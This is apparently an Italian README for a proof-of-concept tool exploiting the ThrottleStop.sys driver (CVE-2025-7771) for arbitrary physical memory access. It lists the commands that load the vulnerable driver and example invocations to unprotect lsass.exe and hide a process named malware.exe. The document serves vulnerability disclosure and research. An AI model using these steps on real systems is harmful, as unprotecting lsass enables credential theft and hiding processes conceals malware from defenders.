
Una semplice PoC che dimostra la vulnerabilità nel driver ThrottleStop.sys, mostrando capacità di lettura e scrittura arbitraria della memoria fisica, nonché la traduzione degli indirizzi da virtuale a fisico utilizzando Superfetch.
Un semplice PoC che dimostra la vulnerabilità nel driver ThrottleStop.sys, mostrando capacità arbitrarie di lettura e scrittura della memoria fisica, nonché la traduzione degli indirizzi virtuali in fisici tramite Superfetch.
Avvia cmd.exe con privilegi di amministratore e registra un servizio driver kernel con tipo "kernel" e binPath che punta alla posizione del driver vulnerabile.
> sc create ThrottleStop binPath= <path> type= kernel`
> sc start ThrottleStop
Comandi:
--protect : Protect a process.
--unprotect : Unprotect a potected process.
--hide : Hide a process.
--unhide : Unhide a process.
--help : Print help
Esempi:
CVE-2025-7771.exe --protect notepad.exe o CVE-2025-7771exe --protect 12345
CVE-2025-7771.exe --unprotect lsass.exe o CVE-2025-7771.exe --unprotect 12345
CVE-2025-7771.exe --hide malware.exe o CVE-2025-7771.exe --hide 12345
Per riattivare un processo nascosto, puoi usare il comando --unhide specificando l'indirizzo eprocess del processo nascosto con '--eprocess':
CVE-2025-7771.exe --unhide --eprocess 0xffffc207da1d9240
Sei responsabile di assicurarti di avere l'autorizzazione appropriata prima di utilizzare questo strumento. L'autore non si assume alcuna responsabilità per un uso improprio.
Questo è un progetto in corso, contributi e suggerimenti sono benvenuti! Se hai idee, miglioramenti o desideri collaborare, non esitare a contattarmi all'indirizzo: [email protected]